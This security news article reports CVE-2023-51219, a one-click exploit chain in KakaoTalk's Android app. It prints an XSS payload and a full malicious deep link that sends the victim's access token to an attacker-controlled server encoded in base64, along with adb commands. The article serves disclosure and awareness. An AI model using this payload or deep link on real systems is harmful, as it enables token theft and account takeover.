Monday, July 22, 2024
EHA

1-Click Exploit In Kakaotalk’s Android App Allows Arbitrary Code Execution

KakaoTalk is an Android application that is predominantly installed and used by over 100 million people.

It is a widely popular application in South Korea that has payment, ride-hailing services, shopping, email etc., But the end-to-end encryption is not enabled by default on KakaoTalk as it is an opt-in feature under the name “Secure Chat”. 

Further, this End-to-end encryption is not supported in group messaging or voice calling.

However, KakaoTalk has been discovered with a critical vulnerability that could allow an unauthorized remote threat actor to leak an access token of a victim via an HTTP request header. 

In addition, this token can also be used to take over the victim’s user account and read their chat messages by registering an attacker-controlled device.

This vulnerability has been assigned with CVE-2023-51219 and the severity is yet to be categorized.

Scan Your Business Email Inbox to Find Advanced Email Threats - Try AI-Powered Free Threat Scan

1-Click Exploit Vulnerability

According to the reports shared with Cyber Security News, the main entry point of this vulnerability is the CommerceBuyActivity webview which has multiple attack points as follows:

  • It can be started with a Deep link (adb shell am start kakaotalk://buy)
  • Javascript enabled
  • supports Intent:// that can be used to send data to other non-exported app components via JS
  • No sanitization
  • Leaks an Authorization HTTP header that can be done through Netcat listener in a terminal window and running the $ adb shell am start kakaotalk://buy to start the CommerceBuyActivity WebView

However, though there is an option to leak the Authorization header using GET request, there is small validation there that prevents an attacker from loading any arbitrary attacker-controlled URLs.

To overcome this issue, the code was analyzed which provided information that the path, query and fragment of the URL are using the attacker’s input.

URL Redirect To DOM XSS

As KakaoTalk has a same origin policy that does not load any arbitrary URLs, researchers were checking to see if there are any kakao domains that are vulnerable to DOM XSS.

There was one endpoint identified that was vulnerable to redirection to any kakao domain.

To leverage this same site open-redirect for malicious purposes, there was an XSS flaw discovered.

This XSS flaw was found in the m.shoppinghow.kakao.com subdomain which used DOM Invader Canary string and already had an Stored XSS payload. The XSS payload was so simple which was “><img src=x onerror=alert(1);>. 

So combining this XSS, attackers created a malicious deep link which was kakaotalk://auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Y25001977964/q:”><img src=x onerror=alert(1);>.

This leaked the user’s access token via the Authorization header which was then sent to the attacker-controlled server by encoding the attacker URL to base64.

kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:”><img src=x onerror=”document.location=atob(‘aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv’);”>

As a matter of fact, this token can be used to take over the victim’s Kakao mail account that was used for registration.

Additionally, if the user does not have a Kakao mail account, an attacker can still create a new Kakao Mail account and see the chat messages. 

Furthermore, another interesting thing is that the Kakao Mail account overwrites the user’s previous registered mail address without any additional checks.

Further the researchers have also detailed about password reset, via Burp, malicious Deep link creation and a Proof-of-concept has also been published on GitHub.

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free

Website

Latest articles

SonicOS IPSec VPN Vulnerability Let Attackers Cause Dos Condition

SonicWall has disclosed a critical heap-based buffer overflow vulnerability in its SonicOS IPSec VPN....

Hackers Registered 500k+ Domains Using Algorithms For Extensive Cyber Attack

Hackers often register new domains for phishing attacks, spreading malware, and other deceitful activities. Such...

Hackers Claim Breach of Daikin: 40 GB of Confidential Data Exposed

Daikin, the world's largest air conditioner manufacturer, has become the latest target of the...

Emojis Are To Express Emotions, But CyberCriminals For Attacks

There are 3,664 emojis that can be used to express emotions, ideas, or objects...

Beware Of Fake Browser Updates That Installs Malicious BOINC Infrastructre

SocGholish malware, also known as FakeUpdates, has exhibited new behavior since July 4th, 2024,...

Data Breach Increases by Over 1,000% Annually

The Identity Theft Resource Center® (ITRC), a nationally recognized nonprofit organization established to support...

UK Police Arrested 17-year-old Boy Responsible for MGM Resorts Hack

UK police have arrested a 17-year-old boy from Walsall in connection with a notorious...
Eswar
Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Free Webinar

Low Rate DDoS Attack

9 of 10 sites on the AppTrana network have faced a DDoS attack in the last 30 days.
Some DDoS attacks could readily be blocked by rate-limiting, IP reputation checks and other basic mitigation methods.
More than 50% of the DDoS attacks are employing botnets to send slow DDoS attacks where millions of IPs are being employed to send one or two requests per minute..
Key takeaways include:

  • The mechanics of a low-DDoS attack
  • Fundamentals of behavioural AI and rate-limiting
  • Surgical mitigation actions to minimize false positives
  • Role of managed services in DDoS monitoring

Related Articles